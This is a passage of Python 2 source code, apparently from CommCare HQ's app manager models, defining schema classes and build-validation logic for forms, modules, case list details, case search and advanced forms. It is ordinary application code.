data[media_attr] = new_media
return super(NavMenuItemMediaMixin, cls).wrap(data)
def _get_media_by_language(self, media_attr, lang, strict=False):
"""
Return media-path for given language if one exists, else 1st path in the
sorted lang->media-path list
*args:
media_attr: one of 'media_image' or 'media_audio'
lang: language code
**kwargs:
strict: whether to return None if media-path is not set for lang or
to return first path in sorted lang->media-path list
"""
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr)
if not media_dict:
return None
if media_dict.get(lang, ''):
return media_dict[lang]
if not strict:
# if the queried lang key doesn't exist,
# return the first in the sorted list
for lang, item in sorted(media_dict.items()):
return item
@property
def default_media_image(self):
# For older apps that were migrated
return self.icon_by_language('default')
@property
def default_media_audio(self):
# For older apps that were migrated
return self.audio_by_language('default')
def icon_by_language(self, lang, strict=False):
return self._get_media_by_language('media_image', lang, strict=strict)
def audio_by_language(self, lang, strict=False):
return self._get_media_by_language('media_audio', lang, strict=strict)
def _set_media(self, media_attr, lang, media_path):
"""
Caller's responsibility to save doc.
Currently only called from the view which saves after all Edits
"""
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
media_dict[lang] = media_path or ''
setattr(self, media_attr, media_dict)
def set_icon(self, lang, icon_path):
self._set_media('media_image', lang, icon_path)
def set_audio(self, lang, audio_path):
self._set_media('media_audio', lang, audio_path)
def _all_media_paths(self, media_attr):
assert media_attr in ('media_image', 'media_audio')
media_dict = getattr(self, media_attr) or {}
valid_media_paths = {media for media in media_dict.values() if media}
return list(valid_media_paths)
def all_image_paths(self):
return self._all_media_paths('media_image')
def all_audio_paths(self):
return self._all_media_paths('media_audio')
def icon_app_string(self, lang, for_default=False):
"""
Return lang/app_strings.txt translation for given lang
if a path exists for the lang
**kwargs:
for_default: whether app_string is for default/app_strings.txt
"""
if not for_default and self.icon_by_language(lang, strict=True):
return self.icon_by_language(lang, strict=True)
if for_default:
return self.icon_by_language(lang, strict=False)
def audio_app_string(self, lang, for_default=False):
"""
see note on self.icon_app_string
"""
if not for_default and self.audio_by_language(lang, strict=True):
return self.audio_by_language(lang, strict=True)
if for_default:
return self.audio_by_language(lang, strict=False)
class Form(IndexedFormBase, NavMenuItemMediaMixin):
form_type = 'module_form'
form_filter = StringProperty()
requires = StringProperty(choices=["case", "referral", "none"], default="none")
actions = SchemaProperty(FormActions)
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(Form, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta(self)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def session_var_for_action(self, action):
module_case_type = self.get_module().case_type
if action == 'open_case':
return 'case_id_new_{}_0'.format(module_case_type)
if isinstance(action, OpenSubCaseAction):
subcase_type = action.case_type
subcase_index = self.actions.subcases.index(action)
opens_case = 'open_case' in self.active_actions()
if opens_case:
subcase_index += 1
return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)
def _get_active_actions(self, types):
actions = {}
for action_type in types:
a = getattr(self.actions, action_type)
if isinstance(a, list):
if a:
actions[action_type] = a
elif a.is_active():
actions[action_type] = a
return actions
def active_actions(self):
if self.get_app().application_version == APP_V1:
action_types = (
'open_case', 'update_case', 'close_case',
'open_referral', 'update_referral', 'close_referral',
'case_preload', 'referral_preload'
)
else:
if self.requires == 'none':
action_types = (
'open_case', 'update_case', 'close_case', 'subcases',
'usercase_update', 'usercase_preload',
)
elif self.requires == 'case':
action_types = (
'update_case', 'close_case', 'case_preload', 'subcases',
'usercase_update', 'usercase_preload', 'load_from_form',
)
else:
# this is left around for legacy migrated apps
action_types = (
'open_case', 'update_case', 'close_case',
'case_preload', 'subcases',
'usercase_update', 'usercase_preload',
)
return self._get_active_actions(action_types)
def active_non_preloader_actions(self):
return self._get_active_actions((
'open_case', 'update_case', 'close_case',
'open_referral', 'update_referral', 'close_referral'))
def check_actions(self):
errors = []
subcase_names = set()
for subcase_action in self.actions.subcases:
if not subcase_action.case_type:
errors.append({'type': 'subcase has no case type'})
subcase_names.update(subcase_action.case_properties)
if self.requires == 'none' and self.actions.open_case.is_active() \
and not self.actions.open_case.name_path:
errors.append({'type': 'case_name required'})
errors.extend(self.check_case_properties(
all_names=self.actions.all_property_names(),
subcase_names=subcase_names
))
def generate_paths():
for action in self.active_actions().values():
if isinstance(action, list):
actions = action
else:
actions = [action]
for action in actions:
for path in FormAction.get_action_paths(action):
yield path
errors.extend(self.check_paths(generate_paths()))
return errors
def requires_case(self):
# all referrals also require cases
return self.requires in ("case", "referral")
def requires_case_type(self):
return self.requires_case() or \
bool(self.active_non_preloader_actions())
def requires_referral(self):
return self.requires == "referral"
def uses_parent_case(self):
"""
Returns True if any of the load/update properties references the
parent case; False otherwise
"""
return any([name.startswith('parent/')
for name in self.actions.all_property_names()])
def get_registration_actions(self, case_type):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
reg_actions = []
if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
reg_actions.append('open_case')
subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
if case_type:
subcase_actions = [a for a in subcase_actions if a.case_type == case_type]
reg_actions.extend(subcase_actions)
return reg_actions
def is_registration_form(self, case_type=None):
reg_actions = self.get_registration_actions(case_type)
return len(reg_actions) == 1
def uses_usercase(self):
return actions_use_usercase(self.active_actions())
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
errors = []
if xml_valid:
for error in self.check_actions():
error.update(error_meta)
errors.append(error)
if validate_module:
needs_case_type = False
needs_case_detail = False
needs_referral_detail = False
if self.requires_case():
needs_case_detail = True
needs_case_type = True
if self.requires_case_type():
needs_case_type = True
if self.requires_referral():
needs_referral_detail = True
errors.extend(self.get_module().get_case_errors(
needs_case_type=needs_case_type,
needs_case_detail=needs_case_detail,
needs_referral_detail=needs_referral_detail,
))
return errors
def get_case_updates(self, case_type):
# This method is used by both get_all_case_properties and
# get_usercase_properties. In the case of usercase properties, use
# the usercase_update action, and for normal cases, use the
# update_case action
if case_type == self.get_module().case_type or case_type == USERCASE_TYPE:
format_key = self.get_case_property_name_formatter()
action = self.actions.usercase_update if case_type == USERCASE_TYPE else self.actions.update_case
return [format_key(*item) for item in action.update.items()]
return []
@memoized
def get_subcase_types(self):
'''
Return a list of each case type for which this Form opens a new subcase.
:return:
'''
return {subcase.case_type for subcase in self.actions.subcases if subcase.close_condition.type == "never"}
@memoized
def get_parent_types_and_contributed_properties(self, module_case_type, case_type):
parent_types = set()
case_properties = set()
for subcase in self.actions.subcases:
if subcase.case_type == case_type:
case_properties.update(
subcase.case_properties.keys()
)
if case_type != module_case_type and (
self.actions.open_case.is_active() or
self.actions.update_case.is_active() or
self.actions.close_case.is_active()):
parent_types.add((module_case_type, subcase.reference_id or 'parent'))
return parent_types, case_properties
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_triggers=True,
include_groups=True, include_translations=True)
}
module_case_type = self.get_module().case_type
type_meta = app_case_meta.get_type(module_case_type)
for type_, action in self.active_actions().items():
if type_ == 'open_case':
type_meta.add_opener(self.unique_id, action.condition)
self.add_property_save(
app_case_meta,
module_case_type,
'name',
questions,
action.name_path
)
if type_ == 'close_case':
type_meta.add_closer(self.unique_id, action.condition)
if type_ == 'update_case':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_save(
app_case_meta,
module_case_type,
name,
questions,
question_path
)
if type_ == 'case_preload' or type_ == 'load_from_form':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_load(
app_case_meta,
module_case_type,
name,
questions,
question_path
)
if type_ == 'subcases':
for act in action:
if act.is_active():
sub_type_meta = app_case_meta.get_type(act.case_type)
sub_type_meta.add_opener(self.unique_id, act.condition)
if act.close_condition.is_active():
sub_type_meta.add_closer(self.unique_id, act.close_condition)
for name, question_path in FormAction.get_action_properties(act):
self.add_property_save(
app_case_meta,
act.case_type,
name,
questions,
question_path
)
class MappingItem(DocumentSchema):
key = StringProperty()
# lang => localized string
value = DictProperty()
@property
def treat_as_expression(self):
"""
Returns if whether the key can be treated as a valid expression that can be included in
condition-predicate of an if-clause for e.g. if(<expression>, value, ...)
"""
special_chars = '{}()[]=<>."\'/'
return any(special_char in self.key for special_char in special_chars)
@property
def key_as_variable(self):
"""
Return an xml variable name to represent this key.
If the key contains spaces or a condition-predicate of an if-clause,
return a hash of the key with "h" prepended.
If not, return the key with "k" prepended.
The prepended characters prevent the variable name from starting with a
numeral, which is illegal.
"""
if ' ' in self.key or self.treat_as_expression:
return 'h{hash}'.format(hash=hashlib.md5(self.key).hexdigest()[:8])
else:
return 'k{key}'.format(key=self.key)
def key_as_condition(self, property):
if self.treat_as_expression:
condition = dot_interpolate(self.key, property)
return u"{condition}".format(condition=condition)
else:
return u"{property} = '{key}'".format(
property=property,
key=self.key
)
def ref_to_key_variable(self, index, sort_or_display):
if sort_or_display == "sort":
key_as_var = "{}, ".format(index)
elif sort_or_display == "display":
key_as_var = "${var_name}, ".format(var_name=self.key_as_variable)
return key_as_var
class GraphAnnotations(IndexedSchema):
display_text = DictProperty()
x = StringProperty()
y = StringProperty()
class GraphSeries(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
data_path = StringProperty()
x_function = StringProperty()
y_function = StringProperty()
radius_function = StringProperty()
class GraphConfiguration(DocumentSchema):
config = DictProperty()
locale_specific_config = DictProperty()
annotations = SchemaListProperty(GraphAnnotations)
graph_type = StringProperty()
series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
"""
Represents a tab in the case detail screen on the phone.
Each tab is itself a detail, nested inside the app's "main" detail.
"""
header = DictProperty()
# The first index, of all fields in the parent detail, that belongs to this tab
starting_index = IntegerProperty()
# A tab may be associated with a nodeset, resulting in a detail that
# iterates through sub-nodes of an entity rather than a single entity
has_nodeset = BooleanProperty(default=False)
nodeset = StringProperty()
class DetailColumn(IndexedSchema):
"""
Represents a column in case selection screen on the phone. Ex:
{
'header': {'en': 'Sex', 'por': 'Sexo'},
'model': 'case',
'field': 'sex',
'format': 'enum',
'xpath': '.',
'enum': [
{'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
{'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
],
}
"""
header = DictProperty()
model = StringProperty()
field = StringProperty()
format = StringProperty()
enum = SchemaListProperty(MappingItem)
graph_configuration = SchemaProperty(GraphConfiguration)
case_tile_field = StringProperty()
late_flag = IntegerProperty(default=30)
advanced = StringProperty(default="")
calc_xpath = StringProperty(default=".")
filter_xpath = StringProperty(default="")
time_ago_interval = FloatProperty(default=365.25)
@property
def enum_dict(self):
"""for backwards compatibility with building 1.0 apps"""
import warnings
warnings.warn('You should not use enum_dict. Use enum instead',
DeprecationWarning)
return dict((item.key, item.value) for item in self.enum)
def rename_lang(self, old_lang, new_lang):
for dct in [self.header] + [item.value for item in self.enum]:
_rename_key(dct, old_lang, new_lang)
@property
def field_type(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[0]
else:
return 'property' # equivalent to property:parent/case_property
@property
def field_property(self):
if FIELD_SEPARATOR in self.field:
return self.field.split(FIELD_SEPARATOR, 1)[1]
else:
return self.field
class TimeAgoInterval(object):
map = {
'day': 1.0,
'week': 7.0,
'month': 30.4375,
'year': 365.25
}
@classmethod
def get_from_old_format(cls, format):
if format == 'years-ago':
return cls.map['year']
elif format == 'months-ago':
return cls.map['month']
@classmethod
def wrap(cls, data):
if data.get('format') in ('months-ago', 'years-ago'):
data['time_ago_interval'] = cls.TimeAgoInterval.get_from_old_format(data['format'])
data['format'] = 'time-ago'
# Lazy migration: enum used to be a dict, now is a list
if isinstance(data.get('enum'), dict):
data['enum'] = sorted({'key': key, 'value': value}
for key, value in data['enum'].items())
return super(DetailColumn, cls).wrap(data)
@classmethod
def from_json(cls, data):
from corehq.apps.app_manager.views.media_utils import interpolate_media_path
to_ret = cls.wrap(data)
if to_ret.format == 'enum-image':
# interpolate icons-paths
for item in to_ret.enum:
for lang, path in item.value.iteritems():
item.value[lang] = interpolate_media_path(path)
return to_ret
class SortElement(IndexedSchema):
field = StringProperty()
type = StringProperty()
direction = StringProperty()
class SortOnlyDetailColumn(DetailColumn):
"""This is a mock type, not intended to be part of a document"""
@property
def _i(self):
"""
assert that SortOnlyDetailColumn never has ._i or .id called
since it should never be in an app document
"""
raise NotImplementedError()
class CaseListLookupMixin(DocumentSchema):
"""
Allows for the addition of Android Callouts to do lookups from the CaseList
<lookup action="" image="" name="">
<extra key="" value="" />
<response key="" />
<field>
<header><text><locale id=""/></text></header>
<template><text><xpath function=""/></text></template>
</field>
</lookup>
"""
lookup_enabled = BooleanProperty(default=False)
lookup_action = StringProperty()
lookup_name = StringProperty()
lookup_image = JRResourceProperty(required=False)
lookup_extras = SchemaListProperty()
lookup_responses = SchemaListProperty()
lookup_display_results = BooleanProperty(default=False) # Display callout results in case list?
lookup_field_header = DictProperty()
lookup_field_template = StringProperty()
class Detail(IndexedSchema, CaseListLookupMixin):
"""
Full configuration for a case selection screen
"""
display = StringProperty(choices=['short', 'long'])
columns = SchemaListProperty(DetailColumn)
get_columns = IndexedSchema.Getter('columns')
tabs = SchemaListProperty(DetailTab)
get_tabs = IndexedSchema.Getter('tabs')
sort_elements = SchemaListProperty(SortElement)
filter = StringProperty()
# If True, a small tile will display the case name after selection.
persist_case_context = BooleanProperty()
# If True, use case tiles in the case list
use_case_tiles = BooleanProperty()
# If given, use this string for the case tile markup instead of the default temaplte
custom_xml = StringProperty()
persist_tile_on_forms = BooleanProperty()
# If True, the in form tile can be pulled down to reveal all the case details.
pull_down_tile = BooleanProperty()
def get_tab_spans(self):
'''
Return the starting and ending indices into self.columns deliminating
the columns that should be in each tab.
:return:
'''
tabs = list(self.get_tabs())
ret = []
for tab in tabs:
try:
end = tabs[tab.id + 1].starting_index
except IndexError:
end = len(self.columns)
ret.append((tab.starting_index, end))
return ret
@parse_int([1])
def get_column(self, i):
return self.columns[i].with_id(i % len(self.columns), self)
def rename_lang(self, old_lang, new_lang):
for column in self.columns:
column.rename_lang(old_lang, new_lang)
class CaseList(IndexedSchema, NavMenuItemMediaMixin):
label = DictProperty()
show = BooleanProperty(default=False)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
class CaseSearchProperty(DocumentSchema):
"""
Case properties available to search on.
"""
name = StringProperty()
label = DictProperty()
class CaseSearch(DocumentSchema):
"""
Properties and search command label
"""
command_label = DictProperty(default={'en': 'Search All Cases'})
properties = SchemaListProperty(CaseSearchProperty)
class ParentSelect(DocumentSchema):
active = BooleanProperty(default=False)
relationship = StringProperty(default='parent')
module_id = StringProperty()
class FixtureSelect(DocumentSchema):
"""
Configuration for creating a details screen from a fixture which can be used to pre-filter
cases prior to displaying the case list.
fixture_type: FixtureDataType.tag
display_column: name of the column to display in the list
localize: boolean if display_column actually contains the key for the localized string
variable_column: name of the column whose value should be saved when the user selects an item
xpath: xpath expression to use as the case filter
"""
active = BooleanProperty(default=False)
fixture_type = StringProperty()
display_column = StringProperty()
localize = BooleanProperty(default=False)
variable_column = StringProperty()
xpath = StringProperty(default='')
class DetailPair(DocumentSchema):
short = SchemaProperty(Detail)
long = SchemaProperty(Detail)
@classmethod
def wrap(cls, data):
self = super(DetailPair, cls).wrap(data)
self.short.display = 'short'
self.long.display = 'long'
return self
class CaseListForm(NavMenuItemMediaMixin):
form_id = FormIdProperty('modules[*].case_list_form.form_id')
label = DictProperty()
def rename_lang(self, old_lang, new_lang):
_rename_key(self.label, old_lang, new_lang)
class ModuleBase(IndexedSchema, NavMenuItemMediaMixin, CommentMixin):
name = DictProperty(unicode)
unique_id = StringProperty()
case_type = StringProperty()
case_list_form = SchemaProperty(CaseListForm)
module_filter = StringProperty()
root_module_id = StringProperty()
fixture_select = SchemaProperty(FixtureSelect)
auto_select_case = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
if cls is ModuleBase:
doc_type = data['doc_type']
if doc_type == 'Module':
return Module.wrap(data)
elif doc_type == 'CareplanModule':
return CareplanModule.wrap(data)
elif doc_type == 'AdvancedModule':
return AdvancedModule.wrap(data)
elif doc_type == 'ReportModule':
return ReportModule.wrap(data)
elif doc_type == 'ShadowModule':
return ShadowModule.wrap(data)
else:
raise ValueError('Unexpected doc_type for Module', doc_type)
else:
return super(ModuleBase, cls).wrap(data)
def get_or_create_unique_id(self):
"""
It is the caller's responsibility to save the Application
after calling this function.
WARNING: If called on the same doc in different requests without saving,
this function will return a different uuid each time,
likely causing unexpected behavior
"""
if not self.unique_id:
self.unique_id = random_hex()
return self.unique_id
get_forms = IndexedSchema.Getter('forms')
get_suite_forms = IndexedSchema.Getter('forms')
@parse_int([1])
def get_form(self, i):
try:
return self.forms[i].with_id(i % len(self.forms), self)
except IndexError:
raise FormNotFoundException()
def get_child_modules(self):
return [
module for module in self.get_app().get_modules()
if module.unique_id != self.unique_id and getattr(module, 'root_module_id', None) == self.unique_id
]
@property
def root_module(self):
if self.root_module_id:
return self._parent.get_module_by_unique_id(self.root_module_id)
def requires_case_details(self):
return False
def get_case_types(self):
return set([self.case_type])
def get_module_info(self):
return {
'id': self.id,
'name': self.name,
}
def get_app(self):
return self._parent
def default_name(self):
app = self.get_app()
return trans(
self.name,
[app.default_language] + app.langs,
include_lang=False
)
def rename_lang(self, old_lang, new_lang):
_rename_key(self.name, old_lang, new_lang)
for form in self.get_forms():
form.rename_lang(old_lang, new_lang)
for _, detail, _ in self.get_details():
detail.rename_lang(old_lang, new_lang)
def validate_detail_columns(self, columns):
from corehq.apps.app_manager.suite_xml.const import FIELD_TYPE_LOCATION
from corehq.apps.locations.util import parent_child
hierarchy = None
for column in columns:
if column.field_type == FIELD_TYPE_LOCATION:
hierarchy = hierarchy or parent_child(self.get_app().domain)
try:
LocationXpath('').validate(column.field_property, hierarchy)
except LocationXpathValidationError, e:
yield {
'type': 'invalid location xpath',
'details': unicode(e),
'module': self.get_module_info(),
'column': column,
}
def get_form_by_unique_id(self, unique_id):
for form in self.get_forms():
if form.get_unique_id() == unique_id:
return form
def validate_for_build(self):
errors = []
if self.requires_case_details():
errors.extend(self.get_case_errors(
needs_case_type=True,
needs_case_detail=True
))
if self.case_list_form.form_id:
try:
form = self.get_app().get_form(self.case_list_form.form_id)
except FormNotFoundException:
errors.append({
'type': 'case list form missing',
'module': self.get_module_info()
})
else:
if not form.is_registration_form(self.case_type):
errors.append({
'type': 'case list form not registration',
'module': self.get_module_info(),
'form': form,
})
if self.module_filter:
is_valid, message = validate_xpath(self.module_filter)
if not is_valid:
errors.append({
'type': 'module filter has xpath error',
'xpath_error': message,
'module': self.get_module_info(),
})
return errors
@memoized
def get_subcase_types(self):
'''
Return a set of each case type for which this module has a form that
opens a new subcase of that type.
'''
subcase_types = set()
for form in self.get_forms():
if hasattr(form, 'get_subcase_types'):
subcase_types.update(form.get_subcase_types())
return subcase_types
def get_custom_entries(self):
"""
By default, suite entries are configured by forms, but you can also provide custom
entries by overriding this function.
See ReportModule for an example
"""
return []
def uses_media(self):
"""
Whether the module uses media. If this returns false then media will not be generated
for the module.
"""
return True
def uses_usercase(self):
return False
class ModuleDetailsMixin():
@classmethod
def wrap_details(cls, data):
if 'details' in data:
try:
case_short, case_long, ref_short, ref_long = data['details']
except ValueError:
# "need more than 0 values to unpack"
pass
else:
data['case_details'] = {
'short': case_short,
'long': case_long,
}
data['ref_details'] = {
'short': ref_short,
'long': ref_long,
}
finally:
del data['details']
return data
@property
def case_list_filter(self):
try:
return self.case_details.short.filter
except AttributeError:
return None
@property
def detail_sort_elements(self):
try:
return self.case_details.short.sort_elements
except Exception:
return []
def rename_lang(self, old_lang, new_lang):
super(Module, self).rename_lang(old_lang, new_lang)
for case_list in (self.case_list, self.referral_list):
case_list.rename_lang(old_lang, new_lang)
def export_json(self, dump_json=True, keep_unique_id=False):
source = self.to_json()
if not keep_unique_id:
for form in source['forms']:
del form['unique_id']
return json.dumps(source) if dump_json else source
def get_details(self):
return (
('case_short', self.case_details.short, True),
('case_long', self.case_details.long, True),
('ref_short', self.ref_details.short, False),
('ref_long', self.ref_details.long, False),
)
def validate_details_for_build(self):
errors = []
for sort_element in self.detail_sort_elements:
try:
validate_detail_screen_field(sort_element.field)
except ValueError:
errors.append({
'type': 'invalid sort field',
'field': sort_element.field,
'module': self.get_module_info(),
})
if self.case_list_filter:
try:
case_list_filter = interpolate_xpath(self.case_list_filter)
etree.XPath(case_list_filter)
except (etree.XPathSyntaxError, CaseXPathValidationError):
errors.append({
'type': 'invalid filter xpath',
'module': self.get_module_info(),
'filter': self.case_list_filter,
})
for detail in [self.case_details.short, self.case_details.long]:
if detail.use_case_tiles:
if not detail.display == "short":
errors.append({
'type': "invalid tile configuration",
'module': self.get_module_info(),
'reason': _('Case tiles may only be used for the case list (not the case details).')
})
col_by_tile_field = {c.case_tile_field: c for c in detail.columns}
for field in ["header", "top_left", "sex", "bottom_left", "date"]:
if field not in col_by_tile_field:
errors.append({
'type': "invalid tile configuration",
'module': self.get_module_info(),
'reason': _('A case property must be assigned to the "{}" tile field.'.format(field))
})
return errors
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
module_info = self.get_module_info()
if needs_case_type and not self.case_type:
yield {
'type': 'no case type',
'module': module_info,
}
if needs_case_detail:
if not self.case_details.short.columns:
yield {
'type': 'no case detail',
'module': module_info,
}
columns = self.case_details.short.columns + self.case_details.long.columns
errors = self.validate_detail_columns(columns)
for error in errors:
yield error
if needs_referral_detail and not self.ref_details.short.columns:
yield {
'type': 'no ref detail',
'module': module_info,
}
class Module(ModuleBase, ModuleDetailsMixin):
"""
A group of related forms, and configuration that applies to them all.
Translates to a top-level menu on the phone.
"""
module_type = 'basic'
case_label = DictProperty()
referral_label = DictProperty()
forms = SchemaListProperty(Form)
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
put_in_root = BooleanProperty(default=False)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
search_config = SchemaProperty(CaseSearch)
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(Module, cls).wrap(data)
@classmethod
def new_module(cls, name, lang):
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = Module(
name={(lang or 'en'): name or ugettext("Untitled Module")},
forms=[],
case_type='',
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
case_label={(lang or 'en'): 'Cases'},
)
module.get_or_create_unique_id()
return module
def new_form(self, name, lang, attachment=''):
form = Form(
name={lang if lang else "en": name if name else _("Untitled Form")},
)
self.forms.append(form)
form = self.get_form(-1)
form.source = attachment
return form
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, Form):
new_form = form
elif isinstance(form, AdvancedForm) and not form.actions.get_all_actions():
new_form = Form(
name=form.name,
form_filter=form.form_filter,
media_image=form.media_image,
media_audio=form.media_audio
)
new_form._parent = self
form._parent = self
if with_source:
new_form.source = form.source
else:
raise IncompatibleFormTypeException()
if index is not None:
self.forms.insert(index, new_form)
else:
self.forms.append(new_form)
return self.get_form(index or -1)
def validate_for_build(self):
errors = super(Module, self).validate_for_build() + self.validate_details_for_build()
if not self.forms and not self.case_list.show:
errors.append({
'type': 'no forms or case list',
'module': self.get_module_info(),
})
return errors
def requires(self):
r = set(["none"])
for form in self.get_forms():
r.add(form.requires)
if self.case_list.show:
r.add('case')
if self.referral_list.show:
r.add('referral')
for val in ("referral", "case", "none"):
if val in r:
return val
def requires_case_details(self):
ret = False
if self.case_list.show:
return True
for form in self.get_forms():
if form.requires_case():
ret = True
break
return ret
@memoized
def all_forms_require_a_case(self):
return all([form.requires == 'case' for form in self.get_forms()])
def uses_usercase(self):
"""Return True if this module has any forms that use the usercase.
"""
return any(form.uses_usercase() for form in self.get_forms())
class AdvancedForm(IndexedFormBase, NavMenuItemMediaMixin):
form_type = 'advanced_form'
form_filter = StringProperty()
actions = SchemaProperty(AdvancedFormActions)
schedule = SchemaProperty(FormSchedule, default=None)
@classmethod
def wrap(cls, data):
# lazy migration to swap keys with values in action preload dict.
# http://manage.dimagi.com/default.asp?162213
load_actions = data.get('actions', {}).get('load_update_cases', [])
for action in load_actions:
preload = action['preload']
if preload and preload.values()[0].startswith('/'):
action['preload'] = {v: k for k, v in preload.items()}
return super(AdvancedForm, cls).wrap(data)
def pre_delete_hook(self):
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_delete_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this form.".format(error=e, form_id=self.unique_id))
pass
def pre_move_hook(self, from_module, to_module):
if from_module != to_module:
try:
self.disable_schedule()
except (ScheduleError, TypeError, AttributeError) as e:
logging.error("There was a {error} while running the pre_move_hook on {form_id}. "
"There is probably nothing to worry about, but you could check to make sure "
"that there are no issues with this module.".format(error=e, form_id=self.unique_id))
pass
def add_stuff_to_xform(self, xform, build_profile_id=None):
super(AdvancedForm, self).add_stuff_to_xform(xform, build_profile_id)
xform.add_case_and_meta_advanced(self)
def requires_case(self):
"""Form requires a case that must be selected by the user (excludes autoloaded cases)
"""
return any(not action.auto_select for action in self.actions.load_update_cases)
@property
def requires(self):
return 'case' if self.requires_case() else 'none'
def is_registration_form(self, case_type=None):
"""
Defined as form that opens a single case. If the case is a sub-case then
the form is only allowed to load parent cases (and any auto-selected cases).
"""
reg_actions = self.get_registration_actions(case_type)
if len(reg_actions) != 1:
return False
load_actions = [action for action in self.actions.load_update_cases if not action.auto_select]
if not load_actions:
return True
reg_action = reg_actions[0]
if not reg_action.case_indices:
return False
actions_by_tag = deepcopy(self.actions.actions_meta_by_tag)
actions_by_tag.pop(reg_action.case_tag)
def check_parents(tag):
"""Recursively check parent actions to ensure that all actions for this form are
either parents of the registration action or else auto-select actions.
"""
if not tag:
return not actions_by_tag or all(
getattr(a['action'], 'auto_select', False) for a in actions_by_tag.values()
)
try:
parent = actions_by_tag.pop(tag)
except KeyError:
return False
return all(check_parents(p.tag) for p in parent['action'].case_indices)
return all(check_parents(parent.tag) for parent in reg_action.case_indices)
def get_registration_actions(self, case_type=None):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
registration_actions = [
action for action in self.actions.get_open_actions()
if not action.is_subcase or not action.repeat_context
]
if case_type:
registration_actions = [a for a in registration_actions if a.case_type == case_type]
return registration_actions
def uses_case_type(self, case_type, invert_match=False):
def match(ct):
matches = ct == case_type
return not matches if invert_match else matches
return any(action for action in self.actions.load_update_cases if match(action.case_type))
def uses_usercase(self):
return self.uses_case_type(USERCASE_TYPE)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
def get_module(self):
return self._parent
def get_phase(self):
module = self.get_module()
return next((phase for phase in module.get_schedule_phases()
for form in phase.get_forms()
if form.unique_id == self.unique_id),
None)
def disable_schedule(self):
self.schedule.enabled = False
phase = self.get_phase()
if phase:
phase.remove_form(self)
def check_actions(self):
errors = []
for action in self.actions.get_subcase_actions():
case_tags = self.actions.get_case_tags()
for case_index in action.case_indices:
if case_index.tag not in case_tags:
errors.append({'type': 'missing parent tag', 'case_tag': case_index.tag})
if isinstance(action, AdvancedOpenCaseAction):
if not action.name_path:
errors.append({'type': 'case_name required', 'case_tag': action.case_tag})
for case_index in action.case_indices:
meta = self.actions.actions_meta_by_tag.get(case_index.tag)
if meta and meta['type'] == 'open' and meta['action'].repeat_context:
if (
not action.repeat_context or
not action.repeat_context.startswith(meta['action'].repeat_context)
):
errors.append({'type': 'subcase repeat context',
'case_tag': action.case_tag,
'parent_tag': case_index.tag})
errors.extend(self.check_case_properties(
subcase_names=action.get_property_names(),
case_tag=action.case_tag
))
for action in self.actions.get_all_actions():
if not action.case_type and (not isinstance(action, LoadUpdateAction) or not action.auto_select):
errors.append({'type': "no case type in action", 'case_tag': action.case_tag})
if isinstance(action, LoadUpdateAction) and action.auto_select:
mode = action.auto_select.mode
if not action.auto_select.value_key:
key_names = {
AUTO_SELECT_CASE: _('Case property'),
AUTO_SELECT_FIXTURE: _('Lookup Table field'),
AUTO_SELECT_USER: _('custom user property'),
AUTO_SELECT_RAW: _('custom XPath expression'),
}
if mode in key_names:
errors.append({'type': 'auto select key', 'key_name': key_names[mode]})
if not action.auto_select.value_source:
source_names = {
AUTO_SELECT_CASE: _('Case tag'),
AUTO_SELECT_FIXTURE: _('Lookup Table tag'),
}
if mode in source_names:
errors.append({'type': 'auto select source', 'source_name': source_names[mode]})
elif mode == AUTO_SELECT_CASE:
case_tag = action.auto_select.value_source
if not self.actions.get_action_from_tag(case_tag):
errors.append({'type': 'auto select case ref', 'case_tag': action.case_tag})
errors.extend(self.check_case_properties(
all_names=action.get_property_names(),
case_tag=action.case_tag
))
if self.form_filter:
form_filter_references_case = (
xpath_references_case(self.form_filter) or
xpath_references_user_case(self.form_filter)
)
if form_filter_references_case:
if not any(action for action in self.actions.load_update_cases if not action.auto_select):
errors.append({'type': "filtering without case"})
def generate_paths():
for action in self.actions.get_all_actions():
for path in action.get_paths():
yield path
errors.extend(self.check_paths(generate_paths()))
return errors
def extended_build_validation(self, error_meta, xml_valid, validate_module=True):
errors = []
if xml_valid:
for error in self.check_actions():
error.update(error_meta)
errors.append(error)
module = self.get_module()
